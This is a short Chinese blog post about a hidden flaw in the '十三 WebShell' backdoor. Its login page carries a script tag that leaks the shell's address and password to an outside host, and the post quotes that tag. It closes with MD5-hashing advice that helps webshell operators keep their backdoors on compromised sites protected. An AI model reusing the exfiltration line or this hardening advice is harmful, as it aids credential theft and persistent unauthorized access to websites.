给使用“十三 WebShell”后门黑客的重磅炸弹

时间:2022-05-17 00:00:58

使用“十三 WebShell”后门黑客的重磅炸弹

喜欢使用“十三 WebShell”的后门的黑客们注意啦
我偶尔发现这个后面程序存在着很大的漏洞,您的密码会通过登录页面泄漏给所有人。

事情是这样的,在你的“十三 WebShell”登录界面,点击右键,选择“查看源文件”,这时候奇迹出现了:在代码的最后一句是这样的:
<script src='http://8cce.com/ad/?ad=13&u=127.0.0.1:80/log.asp&p=123456'></script>

知道什么意思了么??上文里的最后那个数字的字符串就是我们所预设的后门登录密码,不信可以试试。后门程序把黑客们挂的程序密码泄漏给所有可以找到它的人。

我不知道作者为什么要这样做,相信您看了这个文章并做了试验之后或许会大吃一惊,原来自己用这个工具享受“黑客”的乐趣的时候自己已经被“黑”了。

我的第一感想是想法给它补上这个漏洞,或者是作者留给工具使用者的后门。
预知如何解决这个漏洞,请继续关注我的日志,或者访问我的QQ空间进行解密。
在我的相册中也同样存在着加密的解决方案。
有兴趣的可以留言索取。。

我不是黑客,可是我们都关心这样一个问题,那就是计算机安全。


解决方案:
=========
我们可以使用MD5加密我们的密码,然后可以把加密后的字符串存放在后门程序页面中,然后在登录的时候加一个事件,把我们从表单中输入的密码再MD5加密一下,这样就可以成功登录,又能保证我们的密码安全。